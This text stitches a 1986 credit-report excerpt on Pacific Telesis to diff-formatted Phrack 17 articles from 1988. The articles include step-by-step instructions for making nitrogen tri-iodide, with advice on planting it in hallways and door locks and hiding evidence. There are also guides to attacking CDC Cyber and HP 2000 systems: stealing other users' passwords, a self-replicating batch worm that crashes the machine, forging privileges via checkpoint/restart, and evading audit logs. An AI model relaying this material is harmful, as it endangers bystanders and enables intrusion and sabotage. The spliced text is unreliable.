SUBSIDIARIES: Subsidiaries: The Company has the following principal
operating subsidiaries, all wholly-owned either directly or indirectly.
The telephone subsidiaries account for over 90% of the operating
results.
(1) Pacific Bell (Inc) San Francisco CA. Formed 1906 as a
California corporation. Acquired in 1984 as part of the divestiture of
AT&T. It is the company's largest subsidiary . It provides
telecommunicaton services within its service area in California.
(2) Nevada Bell (Inc) Reno NV. Incorporated in 1913. acquired from
Pacific Bell in 1984 by the divestiture of its stock. Provides
telecommunications, services in Nevada.
(3) Pac Tel Cellular Inc, TX. Renamed subsidiary formerly known
as Comminications Industries Inc. Acquired in 1986. Operates as a
marketer of cellular and paging services. This subsidiary, in turn, has
several primary subsidiaries as follows:.
(a) Gen Com Incorporated. Provides personal paging services.
(b) Multicom Incorporated. Markets paging services.
(4) Pac Tel Personal Communications. Formed to eventually hold all
of the company's cellular and paging operations. It is the parent of the
following:.
(c) Pac Tel Cellular supports the company's cellular activities.
(d) Pac Tel Mobile Services-formed to rent and sell cellular CPE
and paging equipment and resell cellular services, is now largely
inactive.
(5) Pac Tel Corporation, San Francisco CA began operations in Jan
1986 as a direct holding company subsidiary. It owns the stock of the
following companies:.
(e) Pac Tel Communications Companies-operates two primary
divisions, Pac Tel Info Systems and Pac Tel Spectrum Services.
(f) Pac Tel Finance-provides lease financing services.
(g) Pac Tel Properties-engages in real estate transactions holding
real estate valued at approximately $140 million at Dec 31 1986.
(h) Pac Tel Publishing -inactive at present.
(i) Pacific Telesis International-manages and operates
telecommunicatin businesses in Great Britain, Japan, South Korea, Spain
and Thailand.
(6) Pac Tel Capital Resources, San Francisco, CA -provides funding
through the sale of debt securities.
INTERCOMPANY RELATIONS: Includes common management, intercompany
services, inventory and equipment transactions, loans and advances. In
addition, the debt of Pac Tel Capital Resources is backed by a support
agreement from the parent with the debt unconditionally guaranteed for
repayment without recourse to the stock or assets of the telephone
subsidiaries or any interest therein.
08-27(1Z2 /27) 29709 052678678 H
ANALYST: Dan Quinn
12/31/86 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS % COMPANY INDST
COMPANY CHANGE % NORM %
Total Current Assets. . . . . 2,156,300 9.3 10.6 22.0
Fixed Assets. . . . . . . . . 17,244,900 1.6 84.9 35.6
Other Non-current Assets. . . 919,300 53.8 4.5 42.4
Total Assets. . . . . . . . . 20,320,500 4.0 100.0 100.0
Total Current Liabilities . . 2,405,100 21.3 11.8 11.6
Other Long Term Liab. . . . . 5,564,600 (7.6) 27.4 46.8
Net Worth . . . . . . . . . . 7,753,300 6.0 38.2 35.2
Total Liabilities & Worth. . 20,320,500 4.0 100.0 100.0
Net Sales . . . . . . . . . . 8,977,300 5.6 100.0 100.0
Gross Profit. . . . . . . . . ---- ---- ---- 40.1
RATIOS % ---INDUSTRY QUARTILES---
COMPANY CHANGE UPPER MEDIAN LOWER
Quick Ratio . . . . . . . . . 0.7 ---- 2.9 1.2 0.6
Current Ratio . . . . . . . . 0.9 (10.0) 4.9 2.2 1.0
Total Liab to Net Worth (%) . 162.1 (2.9) 127.4 180.2 297.2
Sales to Inventory. . . . . . 77.2 10.6 56.2 33.8 20.0
Return on Sales (%) . . . . . 12.0 10.1 20.1 14.6 11.3
Return on Assets (%). . . . . 5.3 10.4 7.2 5.7 3.7
Return on Net Worth (%) . . . 13.9 9.4 19.0 15.9 12.8
Industry norms based on 469 firms,
with assets over $5 million.

174
phrack17/4.txt Normal file
View file

@ -0,0 +1,174 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 4 of 12 : Nitrogen-Trioxide Explosives
------------------------------------------------------------------------------
Working notes on Nitrogen Tri-Iodide (NI-3)
By: Signal Sustain
INTRODUCTION
This particular explosive is a real loser. It is incredibly unstable,
dangerous to make, dangerous to work with, and you can't do much with it,
either. A string of Black Cats is worth far more. At least you can blow up
anthills with those.
NI-3 is basically a compound you can make easily by mixing up iodine crystals
and ammonia. The resulting precipitate is very powerful and very unstable.
It is semi stable when wet (nothing you want to trust) and absolutely unstable
when dry. When dry, anything will set it off, such as vibration, wind, sun, a
fly landing on it. It has to be one of the most unstable explosives you can
deal with.
But it's easy to make. Anyone can walk into a chem supply house, and get a
bottle of iodine, and and a supermarket, and get clear ammonia. Mix them and
you're there. (See below for more on this)
So, some of you are going to try it, so I might as well pass on some tips from
hard experience. (I learned it was a loser by trying it).
Use Small Batches
First, make one very small batch first. Once you learn how powerful this
stuff is, you'll see why. If you're mixing iodine crystals (that's right,
crystals, iodine is a metal, a halogen, and its solid form is crystals; the
junk they sell as "iodine" in the grocery store is about 3% iodine in a bunch
of solvents, and doesn't work for this application), you want maybe 1/4
teaspoonful MAX, even less maybe. 1/4 TSP of this stuff is one hellacious
bang; it rattled the windows for a block around when it went off in my back
yard.
So go with 1/4 TSP, if I can talk you into it. The reason is the instability
of this compound. If you mix up two teaspoonfuls and it goes off in your
hand, kiss your hand goodbye right down to the wrist. A bucketful would
probably level any house you'll find. But 1/4 teaspoon, you might keep your
fingers. Since I know you're not going to mix this stuff up with remote
tools, keep the quantities small. This stuff is so unstable it's best to
hedge your bets.
Note: When holding NI3, try to hold with remote tools -- forceps? But if you
have to pick it up, fold your thumb next to your first finger, and grip around
with your fingers only. Do not grip the flask the conventional way, fingers
on one side, thumb of the other. This way, if it goes, you may still have an
opposing thumb, which is enough to get by with.
The compound is far more stable when wet, but not certain-stable. That's why
companies that make explosives won't use it; even a small chance of it blowing
up is too dangerous. (They still lose dynamite plants every now and then,
too, which is why they're fully automated). But when this stuff gets dry,
look out. Heinlein says "A harsh look will set it off", and he isn't kidding.
Wind, vibration, a breath across it, anything will trigger it off. (By the
way, Heinlein's process, from SF book "Farnham's Freehold", doesn't work,
either -- you can't use iodine liquid for this. You must use iodine
crystals.)
Don't Store It
What's so wickedly dangerous is if you try to store the stuff. Say you put it
in a cup. After a day, a crust forms around the rim of the liquid, and it
dries out. You pick up the cup, kabang!, the crust goes off, and the liquid
goes up from the shock. Your fingers sail into your neighbor's lawn. If you
make this, take extreme pains to keep it all wet. At least stopper the
testtube, so it can't evaporate.
Making It
Still want to make it? Okay. Get some iodine crystals at a chem supply
store. If they ask, say you need to purify water for a camping trip, and
they'll lecture you on better alternatives (halazone) but you can still get
it. Or, tell them you've been elected to play Mr. Wizard, and be honest --
you'll probably get it too. Possession is not illegal.
Get as little as possible. You need little and it's useless once you've tried
it once. Aim for 1/4 teaspoonful.
Second, get some CLEAR, NON SUDSY ammonia at the store, like for cleaning
purposes (BUT NO SUDS! They screw things up, it doesn't make the NI-3).
Third, pour ammonia in a bowl. Peeew! Nice smell.
Fourth, add 1/4 TSP or less of iodine crystals. Note these crystals, which
looks like instant coffee, will attack other metals, so look out for your
tableware. Use plastic everything (Bowl, spoon) if you can. These crystals
will also leave long-standing iodine stains on hands, and that's damned
incriminating if there was just an NI-3 explosion and they're looking for who
did it. Rubber gloves, please, dispose after use.
Now the crystals will sort of spread out. Stir a little if need be. Be
damned careful not to leave solution on the spoon that might dry. It'll go
off if you do, believe me. (Experience).
Let them spread out and fizzz. They will. Then after an hour or so there
will be left some reddish-brown glop in the bottom of the clear ammonia. It's
sticky like mud, hard to handle.. That's the NI-3.
It is safe right now, as it is wet. (DO NOT LET A RIM FORM ON THE AMMONIA
LIQUID!)
Using It
Now let's use up this junk right away and DON'T try to store it.
Go put it outside someplace safe. In my high school, someone once sprinkled
tiny, tiny bits (like individual crystals) in a hallway. Works good, it's
like setting off a cap under someone's shoe after the stuff dries. You need
far less than 1/4 TSP for this, too.
Spread it out in the sun, let it dry. DO NOT DISTURB. If you hear a sudden
CRACK!, why, it means the wind just blew enough to set it off, or maybe it
just went off by itself. It does that too.
It must be thoroughly dry to reach max instability where a harsh look sets it
off. Of course the top crystals dry first, so heads up. Any sharp impact
will set it off, wet or dry.
While you're waiting for it to dry, go BURN the plastic cup and spoon you made
it with. You'll hear small snapping noises as you do; this is the solution
drying and going off in the flames.
After two hours or so, toss rocks at the NI3 from a long ways away, and you'll
see it go off. Purplish fumes follow each explosion. It's a sharp CRACK, you
can't miss it.
Anyway. Like I say, most people make this because the ingredients are so
easily available. They make it, say what the hell do I do now?, and sprinkle
tiny crystals in the hallway. Bang bang bang. And they never make it again,
because you only get one set of fingers per hand, and most people want to keep
them.
Or they put it in door locks (while still in the "sludge" form), and wait for
it to try. Next person who sticks a key in there has a big surprise.
(This is also why most high school chem teachers lock up the iodine crystals.)
Getting Rid Of It
If you wash the NI-3 crystals down your kitchen sink, then you have to only
wait for them to dry out and go off. They'll stick to the pipe (halogen
property, there). I heard a set of pipes pop and crackle for days after this
was done. I'd recommend going and throwing the mess into a vacant lots or
something, and trying to set it off so no one else does accidentally.
If you do this, good luck, and you've been warned.
-- Signal Sustain
------------------------------------------------------------------------------

514
phrack17/5.txt Normal file
View file

@ -0,0 +1,514 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 5 of 12 : How to Hack Cyber Systems
How To Hack A CDC Cyber
By: ** Grey Sorcerer
Index:
1. General Hacking Tips
2. Fun with the card punch
3. Getting a new user number the easy way
4. Hacking with Telex and the CDC's batch design
5. Grabbing a copy of the whole System
6. Staying Rolled In with BREAK
7. Macro Library
8. RJE Status Checks
9. The Worm
10. The Checkpoint/Restart Method to a Better Validation
I'm going to go ahead and skip all the stuff that's in your CDC reference
manuals.. what's a local file and all that. If you're at the point of being
ready to hack the system, you know all that; if not, you'll have to get up to
speed on it before a lot of this will make sense. Seems to me too many "how
to hack" files are just short rewrites of the user manuals (which you should
get for any serious penetration attempt anyway, or you'll miss lots of
possibilities), without any tips on ways to hack the system.
General hacking tips:
Don't get caught. Use remote dialups if possible and never never use any user
number you could be associated with. Also never re-use a user number.
Remember your typical Cyber site has a zillion user numbers, and they can't
watch every one. Hide in numbers. And anytime things get "hot", lay off for
awhile.
Magtapes are great. They hold about 60 Meg, a pile of data, and can hold even
more with the new drives. You can hide a lot of stuff here offline, like
dumps of the system, etc., to peruse. Buy a few top quality ones.. I like
Black Watch tapes my site sells to me the most, and put some innocuous crap on
the first few records.. data or a class program or whatever, then get to the
good stuff. That way you'll pass a cursory check. Remember a usual site has
THOUSANDS of tapes and cannot possibly be scanning every one; they haven't
time.
One thing about the Cybers -- they keep this audit trail called a "port log"
on all PPU and CPU accesses. Normally, it's not looked at. But just remember
that *everything* you do is being recorded if someone has the brains and the
determination (which ultimately is from you) to look for it. So don't do
something stupid like doing real work on your user number, log off, log right
onto another, and dump the system. They WILL know.
Leave No Tracks.
Also remember the first rule of bragging: Your Friends Turn You In.
And the second rule: If everyone learns the trick to increasing priority,
you'll all be back on the same level again, won't you? And if you show just
two friends, count on this: they'll both show two friends, who will show
four...
So enjoy the joke yourself and keep it that way.
Fun With The Card Punch
Yes, incredibly, CDC sites still use punch cards. This is well in keeping
with CDC's overall approach to life ("It's the 1960's").
The first thing to do is empty the card punch's punchbin of all the little
punchlets, and throw them in someone's hair some rowdy night. I guarantee the
little suckers will stay in their hair for six months, they are impossible to
get out. Static or something makes them cling like lice. Showers don't even
work.
The next thing to do is watch how your local installation handles punch card
decks. Generally it works like this. The operators love punchcard jobs
because they can give them ultra-low priority, and make the poor saps who use
them wait while the ops run their poster-maker or Star Trek job at high
priority. So usually you feed in your punchcard deck, go to the printout
room, and a year later, out comes your printout.
Also, a lot of people generally get their decks fed in at once at the card
reader.
If you can, punch a card that's completely spaghetti -- all holes punched.
This has also been known to crash the cardreader PPU and down the system. Ha,
ha. It is also almost certain to jam the reader. If you want to watch an
operator on his back trying to pick pieces of card out of the reader with
tweezers, here's your chance.
Next, the structure of a card deck job gives lots of possibilities for fun.
Generally it looks like this:
JOB card: the job name (first 4 characters)
User Card: Some user number and password -- varies with site
EOR card: 7-8-9 are punched
Your Batch job (typically, Compile This Fortran Program). You know, FTN.
LGO. (means, run the Compiled Program)
EOR card: 7-8-9 are punched
The Fortran program source code
EOR card: 7-8-9 are punched
The Data for your Fortran program
EOF card: 6-7-8-9 are punched. This indicates: (end of deck)
This is extremely typical for your beginning Fortran class.
In a usual mainframe site, the punchdecks accumulate in a bin at the operator
desk. Then, whenever he gets to it, the card reader operator takes about
fifty punchdecks, gathers them all together end to end, and runs them through.
Then he puts them back in the bin and goes back to his Penthouse.
GETTING A NEW USER NUMBER THE EASY WAY
Try this for laughs: make your Batch job into:
JOB card: the job name (first 4 characters)
User Card: Some user number and password -- varies with site
EOR card: 7-8-9 are punched
COPYEI INPUT,filename: This copies everything following the EOR mark to the
filename in this account.
EOR Card: 7-8-9 are punched.
Then DO NOT put an EOF card at the end of your job.
Big surprise for the job following yours: his entire punch deck, with, of
course, his user number and password, will be copied to your account. This is
because the last card in YOUR deck is the end-of-record, which indicates the
program's data is coming next, and that's the next person's punch deck, all
the way up to -his- EOF card. The COPYEI will make sure to skip those pesky
record marks, too.
I think you can imagine the rest, it ain't hard.
Hacking With Telex
When CDC added timeshare to the punch-card batch-job designed Cyber machines,
they made two types of access to the system: Batch and Telex. Batch is a
punch-card deck, typically, and is run whenever the operator feels like it.
Inside the system, it is given ultra low priority and is squeezed in whenever.
It's a "batch" of things to do, with a start and end.
Telex is another matter. It's the timeshare system, and supports up to, oh,
60 terminals. Depends on the system; the more RAM, the more swapping area (if
you're lucky enough to have that), the more terminals can be supported before
the whole system becomes slug-like.
Telex is handled as a weird "batch" file where the system doesn't know how
much it'll have to do, or where it'll end, but executes commands as you type
them in. A real kludge.
Because the people running on a CRT expect some sort of response, they're
given higher priority. This leads to "Telex thrashing" on heavily loaded CDC
systems; only the Telex users get anywhere, and they sit and fight over the
machine's resources.
The poor dorks with the punch card decks never get into the machine, because
all the Telex users are getting the priority and the CPU. (So DON'T use punch
cards.)
Another good tip: if you are REQUIRED to use punch cards, then go type in
your program on a CRT, and drop it to the automatic punch. Sure saves trying
to correct those typos on cards..
When you're running under Telex, you're part of one of several "jobs" inside
the system. Generally there's "TELEX," something to run the line printer,
something to run the card reader, the mag tape drivers (named "MAGNET") and
maybe a few others floating around. There's limited space inside a Cyber..
would you believe 128K 60-bit words?.. so there's a limited number of jobs
that can fit. CDC put all their effort into "job scheduling" to make the best
of what they had.
You can issue a status command to see all jobs running; it's educational.
Anyway, the CDC machines were originally designed to run card jobs with lots
of magtape access. You know, like IRS stuff. So they never thought a job
could "interrupt," like pressing BREAK on a CRT, because card jobs can't.
This gives great possibilities.
Like:
Grabbing a Copy Of The System
For instance. Go into BATCH mode from Telex, and do a Fortran compile.
While in that, press BREAK. You'll get a "Continue?" verification prompt.
Say no, you'd like to stop.
Now go list your local files. Whups, there's a new BIG one there. In fact,
it's a copy of the ENTIRE system you're running on -- PPU code, CPU code, ALL
compilers, the whole shebang! Go examine this local file; you'll see the
whole bloody works there, mate, ready to play with.
Of course, you're set up to drop this to tape or disk at your leisure, right?
This works because the people at CDC never thought that a Fortran compile
could be interrupted, because they always thought it would be running off
cards. So they left the System local to the job until the compile was done.
Interrupt the compile, it stays local.
Warning: When you do ANYTHING a copy of your current batch process shows up
on the operator console. Typically the operators are reading Penthouse and
don't care, and anyway the display flickers by so fast it's hard to see. But
if you copy the whole system, it takes awhile, and they get a blow-by-blow
description of what's being copied. ("Hey, why is this %^&$^ on terminal 29
copying the PPU code?") I got nailed once this way; I played dumb and they let
me go. ("I thought it was a data file from my program").
Staying "Rolled In"
When the people at CDC designed the job scheduler, they made several "queues."
"Queues" are lines.
There's:
1. Input Queue. Your job hasn't even gotten in yet. It is standing outside,
on disk, waiting.
2. Executing Queue. Your job is currently memory resident and is being
executed, although other jobs currently in memory are
competing for the machine as well. At least you're in
memory.
3. Timed/Event Rollout Queue: Your job is waiting for something, usually a
magtape. Can also be waiting for a given time. Yes, this
means you can put a delayed effect job into the system. Ha,
ha. You are on disk at this point.
4. Rollout Queue: Your job is waiting its turn to execute. You're out on
disk right now doing nothing.
Anyway, let's say you've got a big Pascal compile. First, ALWAYS RUN FROM
TELEX (means, off a CRT). Never use cards. If you use cards you're
automatically going to be low man on the priority schedule, because the CPU
doesn't *have* to get back to you soon. Who of us has time to waste?
Okay, do the compile. Then do a STATUS on your job from another machine.
Typically you'll be left inside the CPU (EXECUTE) for 10 seconds, where you'll
share the actual CPU with about 10-16 other jobs. Then you'll be rolled-out
(ROLLOUT), at which time you're phucked; you have to wait for your priority to
climb back up before it'll execute some more of your job. This can take
several minutes on a deeply loaded system.
(All jobs have a given priority level, which usually increments every 10 sec
or so, until they start executing).
Okay, do this. Press BREAK, then at the "Continue?" prompt, say yes. What
happened? Telex had to "roll your job in" to process the BREAK! So you get
another free 10 seconds of CPU -- which can get a lot done.
If you sit and hit BREAK - Y <return> every 10 sec or so during a really big
job, you will just fly through it. Of course, everyone else will be sitting
and staring at their screen, doing nothing, because you've got the computer.
If you're at a school with a Cyber, this is how to get your homework done at
high speed.
Macro Library
If you have a typical CDC site, they won't give you access to the "Macro
library." This is a set of CPU calls to do various things -- open files, do
directory commands, and whatnot. They will be too terrified of "some hacker."
Reality: The dimbulbs in power don't want to give up ANY of their power to
ANYONE. You can't really do that much more with the Macro library, which
gives assembly language access to the computer, than you can with batch
commands.. except what you do leaves lots less tracks. They REALLY have to
dig to find out what your program did if you use Macro calls.. they have to
go to PPU port logs, which is needle in a haystack sort of stuff, vs. batch
file logs, which are real obvious.
Worry not. Find someone at Arizona State or Minnesota U. that's cool, and get
them to send you a tape of the libraries. You'll get all the code you can
stand to look at. By the way they have a great poster tape... just copy the
posters to the line printer. Takes a long time to print them but it's worth
it. (They have all the classic ones.. man on the moon, various playmates,
Spock, etc. Some are 7 frames wide!).
With the Macro library, you can do many cool things.
The best is a demon scanner. All CDC user numbers have controlled access for
other users to individual files -- either private, (no access to anyone else),
semiprivate (others can read it but a record is made), or public (anyone can
diddle your files, no record). What you want is a program (fairly easy to do
in Fortran) that counts through user numbers, doing directory commands. If it
finds anything, it checks for non semi-private (so no records are made), then
copies it to you.
You'll find the damnedest stuff, I guarantee it. Try to watch some system
type signing in and get the digits of his user number, then scan variations
beginning with that user #. For instance, if he's a SYS1234, then scan all
user #'s beginning with SYS (sysaaaa to sys9999).
Since it's all inside the Fortran program, the only record, other than
hard-to-examine PPU logs, is a "Run Fortran Program" ("LGO.") on the batch
dayfile. If you're not giving the overworked system people reason to suspect
that commonplace, every-day student Fortran compile is anything out of the
ordinary, they will never bother to check -- the amount of data in PPU logs is
OVERWHELMING.
But you can get great stuff.
There's a whole cool library of Fortran-callable routines to do damned near
anything a batch command could do in the Minnesota library. Time to get some
Minnesota friends -- like on UseNet. They're real cooperative about sending
out tapes, etc.
Generally you'll find old files that some System Type made public one day (so
a buddy could copy them) then forgot about. I picked off all sorts of stuff
like this. What's great is I just claimed my Fortran programs were hanging
into infinite loops -- this explained the multi-second CPU execution times.
Since there wasn't any readily available record of what I was up to, they
believed it. Besides, how many idiot users really DO hang into loops? Lots.
Hide in numbers. I got Chess 4.2 this way -- a championship Chess program --
and lots of other stuff. The whole games library, for instance, which was
blocked from access to mere users but not to sysfolk.
Again, they *can* track this down if you make yourself obnoxious (it's going
to be pretty obvious what you're doing if there's a CAT: SYSAAAA
CAT: SYSAAAB CAT: SYSAAAC .. etc. on your PPU port log) so do this on someone
else's user number.
RJE Status Checks
Lots of stupid CDC installations.. well, that doesn't narrow the field much..
have Remote Job Entry stations. Generally at universities they let some poor
student run these at low pay.
What's funny is these RJE's can do a status on the jobs in the system, and the
system screeches to a halt while the status is performed. It gets top
priority.
So, if you want to incite a little rebellion, just sit at your RJE and do
status requests over and over. The system will be even slower than usual.
The Worm
Warning: This is pretty drastic. It goes past mere self-defense in getting
enough priority to get your homework done, or a little harmless exploration
inside your system, to trying to drop the whole shebang.
It works, too.
You can submit batch jobs to the system, just as if you'd run them through the
punchcard reader, using the SUBMIT command. You set up a data file, then do
SUBMIT datafile. It runs separate from you.
Now, let's say we set up a datafile named WORM. It's a batch file. It looks
like this:
JOB
USER,blah (whatever -- a user number you want crucified)
GET,WORM; get a copy of WORM
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
SUBMIT,WORM.; send it to system
(16 times)
(end of file)
Now, you SUBMIT WORM. What happens? Worm makes 16 copies of itself and
submits those. Those in turn make 16 copies of themselves (now we're up to
256) and submit those. Next pass is 4096. Then 65536. Then...
Now, if you're really good, you'll put on your "job card" a request for high
priority. How? Tell the system you need very little memory and very little
CPU time (which is true, Submit takes almost nothing at all). The scheduler
"squeezes" in little jobs between all the big ones everyone loves to run, and
gives ultra-priority to really tiny jobs.
What happens is the system submits itself to death. Sooner or later the input
queue overflows .. there's only so much space .. and the system falls apart.
This is a particularly gruesome thing to do to a system, because if the guy
at the console (count on it) tries the usual startup, there will still be
copies of WORM in the input queue. First one of those gets loose, the system
drops again. With any luck the system will go up and down for several hours
before someone with several connected brain cells arrives at the operator
console and coldstarts the system.
If you've got a whole room full of computer twits, all with their hair tied
behind them with a rubber band into a ponytail, busily running their Pascal
and "C" compiles, you're in for a good time. One second they will all be
printing -- the printers will be going weep-weep across the paper. Next
second, after you run, they will stop. And they will stay stopped. If you've
done it right they can't get even get a status. Ha, ha.
The faster the CPU, the faster it will run itself into the ground.
CDC claims there is a limit on the number of jobs a user number can have in
the system. As usual they blew it and this limit doesn't exist. Anyway, it's
the input queue overflow that kills things, and you can get to the input queue
without the # of jobs validation check.
Bear in mind that *anything* in that batch file is going to get repeated ten
zillion times at the operator console as the little jobs fly by by the
thousands. So be sure to include some charming messages, like:
job,blah
user,blah
* eat me!
get,worm
submit,worm .. etc.
There will now be thousands of little "eat me!"'s scrolling across the console
as fast as the console PPU can print them.
Generally at this point the operator will have his blood pressure really
spraying out his ears.
Rest assured they will move heaven and earth to find you. This includes past
dayfiles, user logs, etc. So be clean. Remember, "Revenge is a dish best
served cold." If you're mad at them, and they know it, wait a year or so,
until they are scratching their heads, wondering who hates them this much.
Also: make sure you don't take down a really important job someone else is
doing, okay? Like, no medical databases, and so forth.
Now, for a really deft touch, submit a timed/event job. This "blocks" the job
for awhile, until a given time is reached. Then, when you're far, far away,
with a great alibi, the job restarts, the system falls apart, and you're
clear. If you do the timed/event rollout with a Fortran program macro call,
it won't even show up on the log.
(Remember that the System Folk will eventually realize, in their little minds,
what you've done. It may take them a year or two though).
CHECKPOINT / RESTART
I've saved the best for last.
CDC's programmers supplied two utilities, called CheckPoint and Restart,
primarily because their computers kept crashing before they would finish
anything. What Checkpoint does is make a COMPLETE copy of what you're doing -
all local files, all of memory, etc. -- into a file, usually on a magtape.
Then Restart "restarts" from that point.
So, when you're running a 12 hour computer job, you sprinkle checkpoints
throughout, and if the CDC drops, you can restart from your last CKP. It's
like a tape backup of a hard disk. This way, you only lose the work done on
your data between the last checkpoint and now, rather than the whole 12 hours.
Look, this is real important on jobs that take days -- check out your local
IRS for details..
Now what's damned funny is if you look closely at the file Checkpoint
generates, you will find a copy of your user validations, which tell
everything about you to the system, along with the user files, memory, etc.
You'll have to do a little digging in hex to find the numbers, but they'll
match up nicely with the display you of your user validations from that batch
command.
Now, let's say you CKP,that makes the CKP file. Then run a little FORTRAN
program to edit the validations that are inside that CKP-generated file. Then
you RESTART from it. Congratulations. You're a self made man. You can do
whatever you want to do - set your priority level to top, grab the line
printer as your personal printer, kick other jobs off the system (it's more
subtle to set their priority to zilch so they never execute), etc. etc.
You're the operator.
This is really the time to be a CDC whiz and know all sorts of dark, devious
things to do. I'd have a list of user numbers handy that have files you'd
like made public access, so you can go in and superzap them (then peruse them
later from other signons), and so forth.
There's some gotchas in here.. for instance, CKP must be run as part of a
batch file out of Telex. But you can work around them now that you know the
people at CDC made RESTART alter your user validations.
It makes sense in a way. If you're trying to restart a job you need the same
priority, memory, and access you had when trying to run it before.
Conclusion
There you have it, the secrets of hacking the Cyber.
They've come out of several years at a college with one CDC machine, which I
will identify as being somewhere East. They worked when I left; while CDC may
have patched some of them, I doubt it. They're not real fast on updates to
their operating system.
** Grey Sorcerer

94
phrack17/6.txt Normal file
View file

@ -0,0 +1,94 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 6 of 12 : How to Hack HP2000's
How to Hack an HP 2000
By: ** Grey Sorcerer
Okay, so you've read the HP-2000 basic guides, and know your way around. I
will not repeat all that.
There's two or three things I've found that allow you through HP 2000
security.
1. When you log in, a file called HELLO on the user number Z999 is run. A lot
of time this file is used to deny you access. Want in? Well, it's just a
BASIC program, and an be BREAKed.. but, usually the first thing they do in
that program is turn Breaks (interrupts) off by the BRK(0) function. However,
if you log in like this:
HELLO-D345,PASS (return) (break)
With the break nearly instantly after the return, a lot of time, you'll abort
the HELLO program, and be home free.
2. If you can create a "bad file", which takes some doing, then anytime you
try to CSAVE this file (compile and save), the system will quickly fade into a
hard crash.
3. How to make a bad file and other goodies:
The most deadly hole in security in the HP2000 is the "two terminal" method.
You've got to understand buffers to see how it works. When you OPEN a file,
or ASSIGN it (same thing), you get 256 bytes of the file -- the first 256.
When you need anymore, you get 256 more. They are brought in off the disk in
discrete chunks. They are stored in "buffers."
So. Save a bunch of junk to disk -- programs, data, whatever. Then once your
user number is full, delete all of it. The effect is to leave the raw jumbled
data on disk.
Pick a time when the system is REAL busy, then:
1. Have terminal #1 running a program that looks for a file to exist (with the
ASSIGN) statement as quickly as it can loop. If it finds the file there, it
goes to the very end of the file, and starts reading backwards, record by
record, looking for data. If it finds data, it lets you know, and stops at an
input prompt. It is now running.
2. Have terminal #2 create a really huge data file (OPEN-FILE, 3000) or
however it goes.
What happens is terminal #2's command starts zeroing all the sectors of the
file, starting at file start. But it only gets so far before someone else
needs the processor, and kicks #2 out. The zeroing stops for a sec. Terminal
#1 gets in, finds the file there, and reads to the end. What's there? Old
trash on disk. (Which can be mighty damned interesting by the way -- did you
know HP uses a discrete mark to indicate end-of-buffer? You've just maybe got
yourself a buffer that is as deep as system memory, and if you're clever, you
can peek or poke anywhere in memory. If so, keep it, it is pure gold).
But. Back to the action.
3. Terminal #2 completes the OPEN. He now deletes the file. This leaves
Terminal #1 with a buffer full of data waiting to be dumped back to disk at
that file's old disk location.
4. Terminal #2 now saves a load of program files, as many as are required to
fill up the area that was taken up by the deleted big file.
5. You let Terminal #1 past the input prompt, and it writes its buffer to
disk. This promptly overlays some program just stored there. Result: "bad
program." HPs are designed with a syntax checker and store programs in token;
a "bad program" is one that the tokens are screwed up in. Since HP assumes
that if a program is THERE, it passed the syntax check, it must be okay...
it's in for big problems. For a quick thrill, just CSAVE it.. system tries
to semi-compile bad code, and drops.
Really, the classier thing to do with this is to use the "bottomless buffer"
to look through your system and change what you don't like.. maybe the
password to A000? Write some HP code, look around memory, have a good time.
It can be done.
** Grey Sorcerer

210
phrack17/7.txt Normal file
View file

@ -0,0 +1,210 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 7 of 12 : Accessing Government Computers
+++++++++++++++++++++++++++++++++++++++
+ ACCESSING GOVERNMENT COMPUTERS +
+ (LEGALLY!) +
+-------------------------------------+
+ Written by The Sorceress +
+ (The Far Side 415/471-1138) +
+++++++++++++++++++++++++++++++++++++++
Comment: I came across this article in Computer Shopper (Sept. 1987) and it
talked about citizens access government computers since we do pay for them
with our taxpayers monies. Since then, I have had friends and gone on a
few myself and the databases are full of information for accessing. One
thing, you usually have to call the sysop for access and give him your real
name, address and the like. They call you back and verify your existence.
Just a word of warning; crashing a BBS is a crime, so I wouldn't fool with
these since they are government based.
-----------------------------------------------------------------------------
National Bureau of Standards -
Microcomputers Electronic Information Exchange.
Sysops: Ted Landberg & Lisa Carnahan
Voice: 301-975-3359
Data: 301-948-5717 300/1200/2400
This BBS is operated by the Institute for Computer Sciences and Technology
which is one of four technical organizations within the National Bureau of
Standards. This board also contains information on the acquisition,
management, security, and use of micro computers.
-----------------------------------------------------------------------------
Census Bureau -
Census Microcomputer and Office Technology Center, Room 1065 FB-3 Washington,
D.C. (Suitland, MD)
Sysop: Nevins Frankel
Voice: 301-763-4494
Data: 301-763-4576 300/1200
The purpose of this BBS is to allow users to access the following: Census
Microcomputer and office technology information center bulletins and
catalogues, software and hardware evaluations, Hardware and software
inventories, Census computer club library, Public Domain software, etc.
-----------------------------------------------------------------------------
Census Bureau -
Census Microcomputer and Office Technology Center, Personnel Division,
Washington DC.
Voice: 301-763-4494
Data: 301-763-4574 300/1200/2400
The purpose of this board is to display Census Bureau vacancies from entry
level to senior management.
-----------------------------------------------------------------------------
Department of Commerce -
Office of the Under Secretary for Economic Affairs, Office of Business
Analysis, Economic Bulletin Board.
Sysop: Ken Rogers
Voice: 202-377-0433
Data: 202-377-3870 300/1200
This is another well run BBS with in-depth news about the Department of
Commerce Economic Affairs Agencies including current press releases and
report summaries.
-----------------------------------------------------------------------------
COE BBS -
Manpower and Force Management Division, Headquarters, U.S. Army Corps of
Engineers, 20 Massachusetts Ave. NW, Washington, DC.
Sysop: Rich Courney
Voice: 202-272-1646
Data: 202-272-1514 300/1200/2400
The files database was one of the largest they ever seen. Directory 70 has
programs for designing masonry and retaining walls using Lotus's Symphony.
-----------------------------------------------------------------------------
General Services Administration -
